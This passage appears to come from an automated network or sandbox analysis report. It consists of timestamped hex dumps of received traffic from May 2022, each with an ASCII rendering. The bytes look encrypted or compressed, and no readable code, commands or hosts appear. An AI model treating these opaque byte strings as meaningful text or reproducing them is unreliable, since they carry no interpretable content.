2c e1
                                                                                    Data Ascii: C8!u%wtWZcVB^~Ui]}ywn-N8McP1ZBH8zxf]o\5F#P/:=j`HE2+ujp|SgR%P-,`!y$`]='RE_9x&o/Y!9:Vn,
                                                                                    2022-05-10 20:11:05 UTC40INData Raw: 7e 4f fd 4b 1f e1 22 5a a7 82 3d bd 6c 87 27 a2 9f 01 84 df f7 2e 94 ed 87 ca 27 c9 e2 06 ec 58 6a 05 77 88 fd 3a 97 e1 e5 c2 00 24 0b 88 eb f2 93 0f da 1a 97 af 5d 02 cb 1f cc a7 e1 48 cb 6c c4 77 3f f9 0f 2e 92 81 72 4d 5e 76 a5 43 9c 3b e2 57 dc d8 5b 94 2e 34 c0 09 c2 ef 98 65 e1 25 91 e9 08 27 1e c3 bd 60 96 ba 62 dc 71 3e b1 4d 44 e7 4b c3 3c df f3 eb 6b 1f bf 34 8d aa 4a 7e d7 50 83 bf 99 7f 13 b1 77 7c a4 32 59 8b 8c 86 10 7f fe ce a9 04 02 88 c8 79 77 1d 55 b8 69 04 06 c5 26 86 25 72 01 f0 dd f7 d4 87 34 de d9 34 21 8e c2 1f dd 83 14 9c 82 8f 2e 50 26 1a 91 c2 3b b6 95 be 18 5d 9d 91 ad c9 d1 06 2e f4 a5 d7 60 cb b0 a8 d3 6b 86 20 25 5a 09 9b 53 46 0f 39 2f 7f cb 30 44 f2 59 69 ec 08 ed 8b d2 8e 8a 1c 61 c8 c5 25 1c b1 61 3d 0e 67 15 63 2c 1a 67
                                                                                    Data Ascii: ~OK"Z=l'.'Xjw:$]Hlw?.rM^vC;W[.4e%'`bq>MDK<k4J~Pw|2YywUi&%r44!.P&;].`k %ZSF9/0DYia%a=gc,g
                                                                                    2022-05-10 20:11:05 UTC41INData Raw: a7 cc 89 c0 f7 a9 9f 25 0c 61 32 db 7f 0c 28 de ef 70 88 57 a2 66 d8 a8 8a d2 58 3d 63 ae ba 99 b3 e2 be 24 6c f7 01 a2 96 a4 02 0c 06 61 08 28 42 f6 e1 a5 78 09 5b e6 85 fa 1e 78 61 2b 45 37 01 cf 59 03 6a 08 9e 0c 3a 92 bf af 55 5d 95 9a cb 24 6e 2c 4b 3a ff c7 f7 1d d4 66 be ee d3 df d3 fe ef ac b7 ed 4b df 95 00 ec 6b 1f 53 0d 88 1d 6f 97 50 a1 27 22 80 4b 15 ee ec 25 eb 98 36 bf 3a 2d b6 91 0c 60 80 de 3b 55 17 46 db 82 87 7f 8d 69 02 80 d3 1d 80 d5 fb 51 2e b6 77 ea 85 f5 5a a2 18 dd 85 6a fe 0e de 78 0c ab 57 77 c5 4a a7 bf d1 c1 60 af cc 9e d0 bf 20 50 3d 3a 79 a8 d9 95 86 70 35 ef cd b2 6b d0 5c f3 46 a2 36 cf a4 55 2c 78 f0 57 01 7e fd 0c 69 9e 3b 55 a2 40 4b f4 3a 2e a2 17 f0 9e 4a 90 a1 68 c8 7f 09 5f 84 96 be 7b 83 b4 48 1d c4 5e bb d1 62 55
                                                                                    Data Ascii: %a2(pWfX=c$la(Bx[xa+E7Yj:U]$n,K:fKkSoP'"K%6:-`;UFiQ.wZjxWwJ` P=:yp5k\F6U,xW~i;U@K:.Jh_{H^bU
                                                                                    2022-05-10 20:11:05 UTC42INData Raw: 96 06 cd 5b 00 88 09 29 30 ab c5 b0 cb 3c f3 f6 21 2a 60 6a 05 27 56 fd 3a 9b fa be fa 13 35 19 8a c8 dd ee e4 33 79 97 ac 5d c2 44 05 d5 b4 e6 fe e4 e5 21 9e 5c 36 08 11 ac 2a 63 45 4f 73 11 7a ac 27 f4 c1 13 d0 40 a8 b5 0f c8 17 d4 32 bd 6d fe 2c 87 75 19 b1 03 c9 ab 91 85 b2 7d dc 62 a2 a0 4a 4f e5 52 de 2a c0 fe c3 71 1e bf 2f 8f 24 fd 48 c2 8a 94 53 11 54 13 be 76 70 a6 37 56 83 9b 97 ae cf e1 d8 70 2c 18 e9 c8 73 15 9c 47 b2 57 1e 03 da 36 0b 1f 78 1a 0f cf de c8 06 83 e7 40 bb 96 5e ca d5 a0 83 b1 b1 83 8f 25 57 32 01 15 75 35 ac 57 51 1c 67 9b 83 55 98 d0 06 26 d4 a7 de 76 c9 16 68 c3 6e 02 bf ee 72 13 90 5f 55 34 a4 2f 6e cb 3e 50 0f 5f 51 f4 1f c0 42 4b 8f 80 96 31 d3 c4 24 05 a7 7a 3f 19 45 89 72 26 0f 70 f7 0e 95 17 4c b1 82 a0 9d 1e 96 d0 5d
                                                                                    Data Ascii: [)0<!*`j'V:53y]D!\6*cEOsz'@2m,u}bJOR*q/$HSTvp7Vp,sGW6x@^%W2u5WQgU&vhnr_U4/n>P_QBK1$z?Er&pL]
                                                                                    2022-05-10 20:11:05 UTC44INData Raw: 90 65 db e5 58 5d 54 a2 71 bc 3a 27 d3 52 3d 76 80 68 8a b6 cf fb f3 6a e6 0e 10 0d ac 2a 8d 6a f6 0f 47 d5 e5 e4 be 51 0c 7a a3 0a f9 18 68 83 2d 44 37 0a f6 49 1e 4e 80 90 1d 35 ad 78 bc 50 46 9d 9a c8 be f1 70 86 32 d1 90 79 1a d2 4e 32 f9 c7 cd d3 e8 ef ac bb cf 84 ca b0 22 c8 6f 16 45 92 b3 6e d5 96 46 83 b5 0b b8 41 39 fa 23 21 f5 3e 08 af 3a 2c a0 b9 94 61 f5 a1 17 4e dd 0f db 83 9e 67 9d 69 8b 8b c0 1a c8 d9 2b 0a 31 aa 5d 79 91 f5 50 80 85 d9 93 7f de 54 ab 79 06 ac 4d 56 6a 58 af ab d3 9a b9 af cc 92 56 87 4f 83 3c 29 75 aa d0 ab cf 7e 0d a8 da 9c 6c c7 58 3f d8 3c 25 cb a4 58 08 3a 69 56 0b 59 eb 3e 4a 95 29 7c 9b 2b 3b 79 3d 06 3e 05 f7 4a 49 9c a1 2f cb 7f 05 23 17 bf 86 71 92 b4 87 21 ed 2f b8 c0 63 55 d4 c1 fd 4c a2 0e f2 2b 72 c9 99 e1 8b
                                                                                    Data Ascii: eX]Tq:'R=vhj*jGQzh-D7IN5xPFp2yN2"oEnFA9#!>:,aNgi+1]yPTyMVjXVO<)u~lX?<%X:iVY>J)|+;y=>JI/#q!/cUL+r
                                                                                    2022-05-10 20:11:05 UTC45INData Raw: 36 d1 53 06 02 5e 79 02 53 1b fd 2b 82 fe 6e 97 93 24 0a 91 f0 e9 e5 8a cc 86 8c b4 42 02 46 07 ab 37 f6 d4 dc 73 07 72 b0 fb 0b 0c 7f 1d 63 45 54 69 28 5e bc b1 f7 cb cb bf cc 83 b2 23 e0 80 d7 73 8f 7b d6 02 87 75 13 39 41 1f ab fc 87 a3 74 c6 6b 8a 38 46 4f e3 3d 4e 2b c0 f9 d0 77 0f b6 2f 83 0c 64 62 c7 8c fb e3 15 54 15 a2 7c 61 af 3c 5a ab 00 87 9e ce 8e 4b 72 2c 1e a1 70 73 04 8c 47 b0 7e 1f 14 24 37 1a 06 0c 92 f1 ce f8 ca 21 ad cf dc b0 80 aa d4 a5 e6 70 88 b0 ae ae 07 17 2f 12 15 64 2d b7 43 87 7e 48 82 87 ea 59 d1 06 22 93 2b de 76 c9 2f 18 ea d9 08 97 f9 61 1b 8b 55 64 b5 af 2f 75 ec 62 53 fb 76 ef e4 19 e2 c9 70 9e 82 36 38 a0 e6 27 16 a4 76 21 1b 42 98 65 43 38 6f 09 09 a8 13 65 12 ef 84 9f 01 8e d2 5a 65 6a c3 e0 13 ff 70 7b 9d b5 7a 9f 02
                                                                                    Data Ascii: 6S^yS+n$BF7srcETi(^#s{u9Atk8FO=N+w/dbT|a<ZKr,psG~$7!p/d-C~HY"+v/aUd/ubSvp68'v!BeC8oeZejp{z
                                                                                    2022-05-10 20:11:05 UTC46INData Raw: 52 31 68 a6 8a 98 b3 e4 a2 e7 6d f7 01 99 07 8d a6 05 69 f0 1a 25 5a e8 cc 12 7e 1d 75 98 8a e8 14 46 c2 2e 45 31 13 d0 5f 1c 53 ac 8f 0b 5f bd af af 5f 45 9a a3 09 30 46 44 5b 32 ff f9 2d 18 d4 60 d0 d2 c5 cb fd 5b fe ab d2 17 5a df 9f 65 db 6d 16 49 87 9f 8a 6f 96 4c 98 b9 4c 52 41 39 fa d5 48 f2 14 03 d0 21 2d a0 b3 fb 47 82 d4 11 5d ef a8 d8 82 83 38 b3 6b 02 8c c6 11 75 cc 0e 33 19 b6 75 c8 82 fc 29 8a 09 da 95 72 de 48 ab 79 06 7f 44 79 f9 59 bf ad d8 e9 03 a9 cc 6b a5 80 35 4a 3c 29 7e a2 ef be dc 2c 35 e5 db c2 6c d6 46 5d 6c a6 36 c5 bf 5a 5e 27 68 56 05 5c f9 04 78 92 01 2f 89 2f 4e dc 24 04 38 10 9f 52 5b b9 83 c6 c5 5a 27 07 1f 97 b4 7d ba 86 5a 34 e6 f1 b8 d7 1a 51 b9 c2 f9 62 da 8b f3 2d 5c b7 9f d9 8f d5 ca 00 0a e4 76 79 d9 cf 81 31 4e da
                                                                                    Data Ascii: R1hmi%Z~uF.E1_S__E0FD[2-`[ZemIoLLRA9H!-G]8ku3u)rHyDyYk5J<)~,5lF]l6Z^'hV\x//N$8R[Z'}Z4Qb-\vy1N
                                                                                    2022-05-10 20:11:05 UTC47INData Raw: e7 07 65 01 24 00 88 e6 eb 8a 1c e4 1d 86 a7 40 3c fd 0d c4 b9 df 4f da 64 d7 49 3f e8 07 3e 8f 1a 4b 74 45 60 33 6b 42 27 f4 cb ca a3 cb 83 b2 23 db 11 0a 67 ac 45 c9 2c 87 7f 0a 28 07 c4 83 c4 87 b2 77 0a 41 a0 a0 45 5e e3 7a 6f 29 c0 f9 ac f6 1f bf 38 a2 26 fb 4b d1 9b 92 06 9c 55 13 b7 61 aa b5 3b 45 8b a2 08 9e c8 e1 d0 75 3d 10 9e a7 fa 05 8a 52 ab 66 06 06 cb 3e 11 61 fb 00 f1 c8 e1 d7 18 85 de d4 a3 f9 dd d4 c5 cc 46 93 a6 8b a7 bd 5c 2e 18 32 3d 35 ad 67 3d 1c 4b 88 ac ba c2 da 2e b6 fd b3 d4 5b f5 4d 3d c0 6e 0e 84 f3 63 1f 8b 5a 23 0f ac 2f 79 d0 2d 53 fa 31 59 e7 19 ee f5 46 9e 80 75 28 d1 c4 23 07 ae 4d 80 09 4f 8f 0c 06 12 6d 0f 09 a8 12 1b 0c 81 a0 97 df 87 e6 7f 43 62 ac cc 02 f2 5e 52 90 9d 4f 42 02 05 66 89 41 16 97 e2 57 1e 74 e7 06 ce
                                                                                    Data Ascii: e$@<OdI?>KtE`3kB'#gE,(wAE^zo)8&KUa;Eu=Rf>aF\.2=5g=K.[M=ncZ#/y-S1YFu(#MOmCb^ROBfAWt
                                                                                    2022-05-10 20:11:05 UTC49INData Raw: 8a 00 af 6d 20 6b f6 0f 3a 5f cd 21 b5 7d 17 49 fa 79 05 e7 b0 e2 3e 52 c9 16 c7 4d 17 59 c4 c9 0c 30 b0 72 be 5a 40 4e 98 c1 21 49 53 5e 04 b9 2e 85 e5 d2 09 79 fb c7 c1 94 9a ee ac b7 d6 42 f4 cb 18 e7 47 de 4e 81 bd 0e 7c 87 55 e6 9a 21 80 47 56 39 fd 21 f9 03 38 f9 49 0e a2 b9 92 72 94 c5 03 4a d4 60 fc 80 85 51 f6 41 00 8a c6 0b bf c8 38 74 0d b4 75 c4 fe d1 58 a8 0d cb 87 68 e5 1f 8e 7b 0c a7 2b 58 d1 58 a9 bc cc c1 bf ac cc 9e 33 aa 22 50 3a 38 7b a8 cb d2 c8 71 35 ef c9 84 44 1f 56 2e dc 8b af 11 bb 4e 38 f5 7f 48 01 74 f5 69 2f 94 29 76 56 3e 4c de 3c 06 39 3e f0 94 59 b9 75 18 66 d6 0e 3e 1f 97 be 71 90 be 83 35 4f 53 ba df 64 7d b8 c2 ff 4a 54 8b 8b 3a 77 ea 9c d9 89 fd c8 32 00 e2 51 be d9 cf e1 ef 40 ee fa 5b 99 d3 13 e0 ed a7 bc 14 47 93 5d
                                                                                    Data Ascii: m k:_!}Iy>RMY0rZ@N!IS^.yBGN|U!GV9!8IrJ`QA8tuXh{+XX3"P:8{q5DV.N8Hti/)vV>L<9>Yuf>q5OSd}JT:w2Q@[G]
                                                                                    2022-05-10 20:11:05 UTC49INData Raw: 84 5e 71 3b 94 2a fc 88 dc e8 58 c1 58 1f 6f 41 45 cd 25 4b 94 f4 2c 63 c2 9f 38 ca 68 28 b6 b3 8e df 8d 3d 0c 36 10 58 a6 0e d3 da 81 c1 45 15 3f be b5 f5 35 e6 98 6b c0 16 b4 da 23 e8 90 6f ad 07 4b 9e b1 ce 1b 44 83 e8 6b 44 8e 10 c2 26 f2 47 ff 2a 1a 75 3a 1d 77 c6 91 e4 c4 8f f7 a1 ad 3d 0e 60 2f 84 b1 0c 65 d1 31 7e f2 7f 95 77 ab 18 86 fa 6a 37 65 8c a0 99 b5 9a fa e3 6c f3 23 9d 02 a5 04 2e 38 f5 09 2e 60 fc e6 b4 7b 72 b5 8b 86 f0 c6 60 c9 04 72 37 00 d1 40 3f 7a ab 9e 06 ee ba a8 85 54 4b 98 8b ce 30 40 42 54 18 f9 df 60 1a d4 67 bf fa f7 cb e7 11 ef a2 a7 c5 5a de 8e 3a f6 6f f2 4d 81 b7 71 6f 96 57 fa 05 23 80 4b 33 8e 6e 21 f3 1e 05 c1 a9 2c a0 b3 87 64 fe fa 16 5b c3 27 cc 80 85 51 94 60 2a 4a c3 1a ad f1 b0 1b 2e bc 5d 5e 91 f5 50 bb 0f cb
                                                                                    Data Ascii: ^q;*XXoAE%K,c8h(=6XE?5k#oKDkD&G*u:w=`/e1~wj7el#.8.`{r`r7@?zTK0@BT`gZ:oMqoW#K3n!,d['Q`*J.]^P
                                                                                    2022-05-10 20:11:05 UTC51INData Raw: c5 00 8d f1 8b d9 21 be ee 64 59 37 ee e2 89 75 4c 9b ca 77 0c 96 92 45 85 e4 03 60 7b 50 81 78 80 3c e1 32 c8 71 0c 54 0b a2 99 ce e0 2c 21 f6 80 b6 19 52 34 2d 8d 1d 98 d7 52 7a 62 c0 e2 0f 9c c4 bf d3 70 58 e6 ec 8d 8a d7 0c cd 79 21 db 49 2b e7 6a dd b6 90 52 9b 6e 87 21 b3 45 29 58 00 f7 39 e1 c7 85 cb 3a ff f4 0c 6d 4c 6b 05 27 99 f3 44 4f ed 68 e3 3a 89 f4 64 1c 3d 8d 08 c2 f3 bd a7 4a 15 7b 02 d5 b1 82 ef da 64 dc 0e f4 e8 07 3e 58 c3 76 60 6d 57 39 52 9e 34 f9 b8 77 d0 46 88 b9 0d f0 17 d4 79 57 6f f8 06 80 5f 19 2f 01 88 9f fc 87 b0 7d d7 67 fb a0 45 4f 86 53 c4 2a 7c fe c3 71 08 bf 3e 8f 24 fd 61 c7 8a 94 69 14 52 13 b1 76 be a7 2d 56 57 9b 84 9e dd e1 c1 73 36 18 89 c9 60 34 8f 54 b9 6e 17 00 b4 36 0b 1f 64 12 f4 f6 00 dc 09 83 cf cd bf 89 5e
                                                                                    Data Ascii: !dY7uLwE`{Px<2qT,!R4-RzbpXy!I+jRn!E)X9:mLk'DOh:d=J{d>Xv`mW9R4wFyWo_/}gEOS*|q>$aiRv-VWs6`4Tn6d^
                                                                                    2022-05-10 20:11:05 UTC52INData Raw: fc f9 64 4c d1 b4 4b bd f4 2c 63 cc a2 3e e0 6e 2a a2 f2 c2 d5 a5 0a 0d 36 1a 49 99 0e d3 a8 f0 fe 45 ce 3e 40 be fa 35 92 8a 71 c0 0d 9f d8 23 e8 8b 64 ae 07 17 24 b1 ce 45 b1 83 f9 18 e8 8e 10 c8 2c f4 39 d4 2b 1a 71 12 0c 75 c6 97 d4 94 8c f7 b9 84 25 0c 75 29 eb 77 16 65 db ee 6b e7 54 a2 37 aa 12 8a a3 52 37 74 f5 c4 99 b3 ee db 9c 50 f7 0b 80 28 7d 01 06 6f e1 66 15 48 e5 ee 99 7a 1b 78 56 99 fb 18 6e 32 38 60 1f 37 db 4d 1d 51 af 98 07 18 82 ae af 5f 8a 91 8a ce 30 38 7e 48 3a f3 f9 a2 19 d4 60 a8 95 fa cb fb 57 e3 a4 d2 71 5b df 9f 07 f6 7c 18 59 92 ba 25 ad 96 46 89 ae 2d 91 4c a3 e3 f8 5f cf 14 09 b5 12 f5 a3 b9 92 70 85 fc 33 5b c7 05 cc ed b8 57 99 63 11 8c e8 0c aa d9 21 0a 28 9e af c1 91 f3 35 1d 0a da 99 0d e4 70 ab 62 63 ba 45 7e d9 4b a4
                                                                                    Data Ascii: dLK,c>n*6IE>@5q#d$E,9+qu%u)wekT7R7tP(}ofHzxVn28`7MQ_08~H:`Wq[|Y%F-L_p3[Wc!(5pbcE~K
                                                                                    2022-05-10 20:11:05 UTC53INData Raw: 78 ab 7a 9b 9a c0 12 0c 4d 93 43 9e e9 3c 5e 66 0d 8b 06 11 2b 37 2b e8 45 11 43 0a 96 06 37 e4 43 ee e3 96 94 48 60 36 f9 ec f4 92 3c 51 7c 77 df e5 2d f3 0a bc d9 60 ad a1 ca 8f 8c c0 17 d9 56 a4 fc 4b 2d 8e e6 d7 a7 9e 11 8c 7d 81 36 a7 67 eb 8b 03 f1 2a 98 c5 c0 ca 3c f3 f2 9c 2a b3 69 05 2b 9d eb 03 cf ec 68 e3 16 be 22 98 e2 e3 9d 31 50 86 86 ad 25 32 55 0e c2 94 c4 c5 df 4c 31 62 a3 ee 68 a9 84 1d 69 69 60 71 3f 43 91 0f 18 c8 cd d6 53 94 9a 62 c9 17 de 64 13 45 15 2f 87 73 0c 39 29 8e aa fc 8d a4 e7 b8 41 a0 a0 43 5e e3 7a 29 29 c0 f9 ac 5b 1c bf 38 89 35 fb 0e d3 8b 94 63 05 5e 7c 76 76 70 ac 17 9d 7d 65 7b 40 de f0 cb 06 17 18 89 c9 5f 08 9b 5e cd 54 17 00 db 59 5c 0e 72 0b 2d df fa cb df 90 c7 cd b2 87 5d 5b 72 f5 2f 67 48 7d 51 3a 78 06 25 1f
                                                                                    Data Ascii: xzMC<^f+7+EC7CH`6<Q|w-`VK-}6g*<*i+h"1P%2UL1bhii`q?CSbdE/s9)AC^z))[85c^|vvp}e{@_^TY\r-][r/gH}Q:x%
                                                                                    2022-05-10 20:11:05 UTC55INData Raw: 20 d9 7b 00 b3 a1 92 2b a4 26 07 48 89 21 99 04 c0 de ed ed 57 15 2f 52 a1 d6 cb 93 a6 60 b3 2f 9c da 25 fb 83 40 8f 14 05 9e a0 dc 5a 5d 7d f8 34 f7 b6 7f c9 2c f4 26 ce 38 08 71 03 18 6a e1 69 cd b9 83 e6 aa 94 2b 82 d7 16 02 76 0c 65 c4 c7 63 c5 57 b3 65 b2 ec 8b fe 5b 44 df 86 7e 93 b9 fe c2 f0 6c e6 19 95 0a 5b 03 2a 6f dd dc 37 43 f6 f6 b4 6c 0f 6c 91 78 fb 34 65 c4 2d 41 37 06 c8 48 08 59 b8 8c 0c 21 a8 b3 51 54 7b 93 9a ca 18 86 43 48 30 f4 cf 69 08 d4 77 ad e1 39 ca d7 57 91 3f bd c5 50 cc 93 16 ec 7d 16 5e 93 a8 00 91 97 6a 83 ae 29 97 db 2a f6 e2 3f e0 06 09 ae 28 33 82 47 95 4d 8d c5 1f 4a c1 60 ff 80 85 51 86 4a 11 98 c0 0b b9 c6 0f e5 2f 9a 65 d3 99 dd 58 ac 0b dc fc 53 f4 70 ad 66 29 b2 56 7e c2 4a b0 b1 26 e8 2f b6 dd 92 4a 1a 08 ef 3e 29
                                                                                    Data Ascii: {+&H!W/R`/%@Z]}4,&8qji+vecWe[D~l[*o7Cllx4e-A7HY!QT{CH0iw9W?P}^j)*?(3GMJ`QJ/eXSpf)V~J&/J>)
                                                                                    2022-05-10 20:11:05 UTC56INData Raw: 7b 97 64 0d 87 7e 01 74 37 21 c5 73 15 54 0e 85 31 d2 7a 52 fd 99 cc bd 0f 6b 25 f8 ed 7f b1 5b e5 64 ab d9 e4 16 a4 33 66 d3 76 37 df e5 9c 9c 5c 2e d4 7a 4e f9 24 2a e0 7b dd b6 9f 2c ad f6 af 2e a6 4f 07 e7 e5 f6 3f 84 fb 79 c9 63 d5 fd 17 09 49 7a 9f 3b 99 f6 3a 98 77 07 20 00 24 00 83 39 8c 69 19 cc 8c 8a b6 41 05 47 94 ec b5 f3 d4 dc 0b dc 60 a3 e2 16 3f 95 0d 74 93 df 48 32 56 94 21 9b ca cc d0 4c dd 9e 50 d9 1c c5 63 13 7b ef 27 96 65 83 40 c8 c9 ab f6 90 68 12 25 67 a2 aa 56 4a f4 59 d5 3a d7 29 59 67 0f b4 2f 9f 33 2b fb a8 43 94 69 1e 4c c9 de 84 70 a6 27 45 85 e9 a6 9c c8 e7 d2 62 3d 1d e6 01 73 04 80 4e 89 41 06 11 d2 59 23 0c 72 07 e0 df e3 da 66 a7 cd dc bc 87 45 c4 c0 a5 73 9b b7 84 9e 3e 75 22 16 1f 73 4b 8c 4d af 1b 4d 93 90 ea c7 d1 06
                                                                                    Data Ascii: {d~t7!sT1zRk%[d3fv7\.zN$*{,.O?ycIz;:w $9iAG`?tH2V!LPc{'e@h%gVJY:)Yg/3+CiLp'Eb=sNAY#rfEs>u"sKMM
                                                                                    2022-05-10 20:11:05 UTC57INData Raw: 21 99 0e d3 dd f0 19 a8 15 2b 5a be f6 34 89 ba 6f c0 24 9f da 23 9e 8b 5f bf 74 ad 9e b1 c4 4f 6c 3a fb 18 f8 a6 d8 c8 2c fe 11 ce 2f 1a 77 3a b3 77 c6 91 e4 5d 8c f7 ad ad 3e 08 60 2f c3 53 0c 65 d1 f9 58 3d 56 a2 7d 83 35 8a d2 58 24 60 97 7b b1 82 e4 d1 e8 41 fc 78 30 00 a5 08 0d b4 2b 09 28 48 f4 e1 9c 21 1d 73 8d 8b f3 30 8d ef 2c 43 1f e4 d8 4d 11 6a f6 9e 0c 36 a9 aa a6 7d b1 9b 8b c8 18 a1 41 48 3c d1 8c 7a 1a d2 75 b9 f3 ef 23 f8 5d e9 84 54 c6 5a d9 bd 57 ff 6f 10 5c 89 be 35 73 92 46 8f 97 3e 84 41 3f d8 a0 21 f3 12 1a b8 33 04 be bd 94 67 a8 cb 13 5b c1 27 86 82 85 51 95 78 0a a2 ee 18 ab df 3d 33 00 b6 75 c8 87 db 09 db 29 d8 93 7f e5 79 ba 70 1d a5 6c 9b d0 58 a9 bc de c1 24 af cc 92 33 a8 22 50 3a 38 76 a8 d7 d2 f8 72 35 e3 ca 95 7d d1 38
                                                                                    Data Ascii: !+Z4o$#_tOl:,/w:w]>`/SeX=V}5X$`{Ax0+(H!s0,CMj6}AH<zu#]TZWo\5sF>A?!3g['Qx=3u)yplX$3"P:8vr5}8
                                                                                    2022-05-10 20:11:05 UTC58INData Raw: e7 0a 9b 39 c7 6b 7c e8 f6 81 1e 1e 69 22 e7 ef 46 19 d5 52 76 59 db f3 05 be 18 b8 d4 62 1f 70 ed 8d 8a de 8b db 7e 4e fe 58 23 f0 73 c1 bc 85 3b 6b e0 b8 27 a2 4e a3 99 0b e0 23 9f eb 51 d0 2d ff 33 dc 8e 67 6a 05 2c 2a ec 23 9c f9 7c c1 a3 24 0a 91 cb f2 9b 19 c6 95 81 b6 4e 3c cb 0e c4 b5 e8 c4 f2 88 dc 61 a9 f9 01 ee 93 c7 7c 6a 54 67 11 ce 94 27 fe d4 dd f8 aa 83 b2 2f 1e 08 ed 2e 53 7e fb 24 96 70 31 c2 00 c9 a1 70 d8 b2 7d d6 4f 94 a1 45 45 e9 43 c2 3d 16 ec c5 60 18 ae 37 b1 1a 02 9e 38 82 bc f5 14 54 19 bb a8 62 8e 1a 56 83 90 ac b0 ca e1 c7 79 04 20 89 c8 79 da 8a 52 92 6f 17 41 c6 36 0b 0e 72 01 f1 ce f2 dc 09 f9 ce dc ba ec 55 d5 c5 d8 55 99 b7 98 8f 2f 5c 35 22 18 75 22 a7 4f af 63 4b 82 90 87 d9 d2 10 4b 18 b2 de 7c dc 61 2c ca 6c 1f f8 f4
                                                                                    Data Ascii: 9k|i"FRvYbp~NX#s;k'N#Q-3gj,*#|$N<a|jTg'/.S~$p1p}OEEC=`78TbVy yRoA6rUU/\5"u"OcKK|a,l
                                                                                    2022-05-10 20:11:05 UTC60INData Raw: 35 92 f6 6a c0 0d 91 da 23 e8 91 5f ae 06 15 9e b1 ce 19 44 83 f9 25 ff 8e 10 51 2d f4 39 c2 2b 1a 71 12 0a 75 c6 8c fc 91 8c b6 a6 85 25 8c 60 29 fa 04 b6 65 db e5 7b ff 17 a6 77 ad 1f a2 93 56 37 63 8c 77 b1 f1 e0 d1 e4 44 d9 09 8a 06 8d ea 07 69 fc 21 b4 48 e5 ee a7 7b 14 5b 1c 85 fa 1e 46 c2 2e 45 31 28 33 4c 17 48 83 02 0c 30 b0 bd ab 53 7f 68 88 ce 36 6e 6c 4a 3a ff f9 92 1b d4 6c 97 66 c7 cb f1 4e e8 aa 95 52 59 df 93 22 d1 6d 16 49 a9 5f 1c 6f 9c 6e 15 bf 23 8a 52 3c e1 fb 09 dd 16 09 b9 2c 04 8e b9 94 6b 96 2a 16 4a c0 27 f5 80 85 51 8f 41 2c 8a c0 10 bd 27 2a 44 02 b1 61 ce 4c 52 5a a8 0b cb 95 51 d8 72 ab 7f 1a 89 6a 7e d3 52 b9 83 98 9a 21 ad cc 9e 4f 88 31 58 14 7e 7d b9 d9 d2 f4 72 35 e3 ca 94 7d d0 38 0a d4 a6 30 de bd 4d 24 23 6b 57 01 72
                                                                                    Data Ascii: 5j#_D%Q-9+qu%`)e{wV7cwDi!H{[F.E1(3LH0Sh6nlJ:lfNRY"mI_on#R<,k*J'QA,'*DaLRZQrj~R!O1X~}r5}80M$#kWr
                                                                                    2022-05-10 20:11:05 UTC61INData Raw: 59 3a fb 6e b0 c3 ac 7e 2e e6 d6 14 bf 23 4c d3 76 31 dd ea 9c 86 ee f6 dc 7e 48 f4 5a 27 f7 e1 ff 77 96 3d bb 44 a9 25 a2 49 6e f0 03 f7 35 82 fc 83 a4 f5 f9 e5 0c 15 a6 68 02 42 41 fd 2b 82 fa 96 eb 5f 08 3e e8 c1 e1 9b 1f df 8b 97 aa 42 7b 7f 0c c4 b9 e6 d9 cb 60 b2 45 a1 e8 01 25 89 1a 0c 63 47 60 3f 43 99 0f bd cf cd d6 29 a8 b0 25 ce 11 c5 7e e6 79 ff 2c 8d ab 0c 0a 29 fe ab fc 8d a1 73 a4 dd a2 a0 4f 42 cd 6a c4 2a ca 21 fa 60 0f a8 e8 9c 35 ec 70 d6 98 1a de 2b 8c ed 4e 89 61 a0 3a 80 90 9c 95 98 d9 f1 ff f8 d2 e7 76 16 66 21 a2 63 b8 6f 1d 13 d5 45 b1 0e 72 0b fc e6 ca dc 09 89 11 de bc bc 5d ff c5 ca 14 ad b7 82 8f 2f 5d 2e d7 1f 75 24 7b 4f af 1d e9 83 81 85 c6 d0 06 24 e6 b3 de 77 c3 3e 1f c2 3c 08 97 ff f5 12 9a 53 95 26 ae 2f 6a c1 21 42 eb
                                                                                    Data Ascii: Y:n~.#Lv1~HZ'w=D%In5hBA+_>B{`E%cG`?C)%~y,)sOBj*!`5p+Na:vf!coEr]/].u${O$w><S&/j!B
                                                                                    2022-05-10 20:11:05 UTC62INData Raw: 2f 7e 9f b1 c4 2a 5f 82 f9 12 ed 8a 01 cc 04 03 39 d4 2d 17 6e 46 87 5e c6 97 cd 86 8b e6 a0 93 05 ff 60 29 eb eb 1d 62 cc f0 56 4b 46 a5 6f 8b 93 8a d2 52 ab 74 81 67 b9 77 e4 d1 e2 f0 e6 0c 90 1f 9c 9e 17 6e ed 29 ae 48 e5 e4 28 6c 1a 6f ab 5d fa 18 6e 70 3d 42 2a 20 49 4d 17 42 37 8f 0b 2e a5 df 33 44 50 87 82 ee 93 46 42 48 a6 e8 d6 65 10 f4 df bf fa c7 57 ea 5a f0 a7 9d 23 5a df 95 96 ee 68 09 43 9e e4 81 7e 91 59 84 a0 59 1c 50 3e ef f3 01 66 14 09 bf a6 3d a7 a6 9b 7e fc 48 06 5c d8 1f cd 1e 94 50 86 78 14 16 d1 1d b4 cb 3d 87 3f b1 6a d1 87 69 4b af 14 ce 85 e5 e7 77 b4 6c 1a 3d 55 79 cc 4e 8f 52 d8 e9 03 33 dd 9f 43 97 36 cc 2d 2e 60 a1 c9 21 cd 77 2a fc fb 1c 6c d6 57 b2 c7 a1 29 d5 a3 c0 31 0c 76 4d 17 e8 ff 01 67 88 3f e0 9b 28 57 e9 1c 86 38
                                                                                    Data Ascii: /~*_9-nF^`)bVKFoRtgwn)H(lo]np=B* IMB7.3DPFBHeWZ#ZhC~YYP>f=~H\Px=?jiKwl=UyNR3C6-.`!w*lW)1vMg?(W8
                                                                                    2022-05-10 20:11:05 UTC63INData Raw: 0a 90 d1 5d 32 f6 99 72 73 39 01 f6 7e 4e e4 7b 22 e1 17 d4 a7 94 b7 bd 6c 96 54 18 4f 01 82 09 ed b2 95 ed 87 ca 2f e0 f4 1f 14 26 56 05 2d 82 d5 7d 8c ed 6e 86 b3 25 0a 91 41 f2 82 0e b2 ba 86 a7 40 3c 00 0a c4 b9 98 67 db 64 d7 c3 b2 f1 1f 4a b8 1d 63 4f 6d 38 3d 52 92 48 47 ca cd da e4 93 ab 3c b6 2b d4 73 83 45 a7 28 87 73 76 9c 00 c9 a1 5e 96 ab 71 df 74 b3 b6 56 5f dd 8c c6 2a c0 ee d2 60 0e 25 33 86 1d 31 63 c7 8a 9d 06 a0 55 13 bb 65 63 b0 3e 44 bb 2b 86 9e c8 f0 d2 62 3e 82 9a cc 7a 15 8e 3b 0b 6e 17 0a c9 33 78 6a 73 01 fb dd f4 cd 0c ab 95 d8 ba 90 